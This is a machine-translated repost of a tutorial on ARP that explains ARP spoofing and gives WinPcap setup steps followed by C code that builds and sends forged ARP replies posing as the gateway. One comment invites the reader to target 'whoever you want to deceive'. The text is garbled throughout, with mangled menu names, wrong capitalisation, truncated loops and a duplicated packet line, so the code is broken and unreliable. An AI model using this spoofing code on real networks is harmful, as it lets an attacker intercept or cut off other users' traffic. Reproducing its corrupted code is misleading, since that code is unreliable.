Shulou(Shulou.com)06/01 Report--

Send ARP packet

ARP address Resolution Protocol, or ARP (Address Resolution Protocol), is a TCP/IP protocol that obtains physical addresses based on IP addresses. When sending information, the host broadcasts the ARP request containing the target IP address to all hosts on the network, and receives the return message to determine the physical address of the target; after receiving the return message, the IP address and the physical address are stored in the local ARP cache and retained for a certain period of time, and the next request directly queries the ARP cache to save resources. The address resolution protocol is based on the mutual trust of the hosts in the network. The hosts on the network can send ARP reply messages on their own. When other hosts receive the reply message, they will record it in the local ARP cache without checking the authenticity of the message. In this way, the user can send a pseudo ARP reply message to a host, so that the information it sends cannot reach the expected host or the wrong host, which constitutes an ARP spoofing. The ARP command can be used to query the correspondence between IP address and MAC address in the native ARP cache, add or delete static correspondence, and so on. Related protocols include RARP and proxy ARP. NDP is used to replace the address resolution protocol in IPv6.

Step 1: run vs2010 and modify the project configuration.

Project-- > * * attribute (alt+F7)

Configure properties-- > inventory tool-- > input and output-- > embed list-- > No

Project-- > * * attribute (alt+F7)

Configuration Properties-- > Cramp Cure colors-- > General-- > additional inclusion directories-- >

Project-- > * * attribute (alt+F7)

Configuration Properties-- > Linker-- > General-- > additional Library Directory-- >

Project-- > * * attribute (alt+F7)

Configure properties-- > linker-- > input-- > attach dependencies-- > supplement "; Packet.lib;wpcap.lib;Ws2_32.lib;"

Project-- > * * attribute (alt+F7)

Configuration properties-- > Candlestick colors-- > preprocessor-- > preprocessor definition-- > supplement "; HAVE_REMOTE"

Part II: copy the arp code to run

/ / WinpCap Test.cpp: defines the entry point for the console application.

/ /

# include "stdafx.h"

# include

Int _ tmain (int argc, _ TCHAR* argv [])

{

Pcap_if_t * allAdapters;// Adapter list

Pcap_if_t * adapter

Pcap_t * adapterHandle;// adapter handle

U_char packet [1020]; / / data packets to be sent

Char errorBuffer [PCAP_ERRBUF_SIZE]; / / error message buffer

If (pcap_findalldevs_ex (PCAP_SRC_IF_STRING, NULL, & allAdapters, errorBuffer) =-1)

{/ / retrieve all network adapters connected to the machine

Fprintf (stderr, "Error in pcap_findalldevs_ex function:% s\ n", errorBuffer)

Return-1

}

If (allAdapters = = NULL)

{/ / No adapters exist

Printf ("\ nNo adapters found! Make sure WinPcap is installed.\ n")

Return 0

}

Int crtAdapter = 0

For (adapter = allAdapters; adapter! = NULL; adapter = adapter- > next)

{/ / traverse input adapter information (name and description information)

Printf ("\ n%d.%s", + + crtAdapter, adapter- > name)

Printf ("-% s\ n", adapter- > description)

}

Printf ("\ n")

/ / Select an adapter

Int adapterNumber

Printf ("Enter the adapter number between 1 and% d:", crtAdapter)

Scanf_s ("d", & adapterNumber)

If (adapterNumber

CrtAdapter)

{

Printf ("\ nAdapter number out of range.\ n")

Pcap_freealldevs (allAdapters); / / release the adapter list

Return-1

}

Adapter = allAdapters

For (crtAdapter = 0; crtAdapter)

Next

/ / Open the specified adapter

AdapterHandle = pcap_open (adapter- > name, / / name of the adapter

65536, / / portion of the packet to capture

/ / 65536 guarantees that the whole

/ / packet will be captured

PCAP_OPENFLAG_PROMISCUOUS, / / promiscuous mode

1000, / / read timeout-1 millisecond

NULL, / / authentication on the remote machine

ErrorBuffer / / error buffer

);

If (adapterHandle = = NULL)

{/ / specified adapter failed to open

Fprintf (stderr, "\ nUnable to open the adapter\ n", adapter- > name)

/ / release adapter list

Pcap_freealldevs (allAdapters)

Return-1

}

Pcap_freealldevs (allAdapters); / / release adapter list c8-9c-dc-22-61-fa

/ / create a data packet

Packet [0] = 0xc8; packet [1] = 0x9c; packet [2] = 0xdc; packet [3] = 0x22; packet [4] = 0x61; packet [5] = 0xfa; / / mac address of the deceived computer

Packet [6] = 0xc8; packet [7] = 0x9c; packet [8] = 0xdc; packet [9] = 0x22; packet [10] = 0x6c; packet [11] = 0x14; / / your own mac address C8-9C-DC-22-6C-14

Packet [12] = 0x08; packet [13] = 0x06; / / Ethernet encapsulated arp protocol (do not move)

Packet [14] = 0x00; packet [15] = 0x01; / / arp Field 1: represents Ethernet

Packet [16] = 0x08; packet [17] = 0x00; / / arp Field 2: represents IP protocol

Packet [18] = 0x06; / / arp Field 3: represents the length of the layer 2 address

Packet [19] = 0x04; / / arp Field 4: represents the length of the layer 3 address

Packet [20] = 0x00; packet [21] = 0x02; / / arp Field 5: this is an arp reply message; the following is the 6th, 7th, 8th and 9th fields of arp

Packet [22] = 0xc8; packet [23] = 0x9c; packet [24] = 0xdc; packet [25] = 0x22; packet [26] = 0x62; packet [27] = 0x09; / / false gateway address

Packet [28] = 0xac; packet [29] = 0x1c; packet [30] = 0x0f; packet [31] = 0xfe; / / ip of the gateway, here is 172.28.15.254 (not needed in our lab)

Packet [0] = 0xc8; packet [1] = 0x9c; packet [2] = 0xdc; packet [3] = 0x22; packet [4] = 0x61; packet [5] = 0xfa; / / mac address of the deceived computer

Packet [38] = 0xac; packet [39] = 0x1c; packet [40] = 0x0f; packet [41] = 0x37; / / the IP address of the deceived computer. This is 172.28.15.55 (change it to the IP of whoever you want to deceive)

/ / send data packets

For (int ssde=0;ssde

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.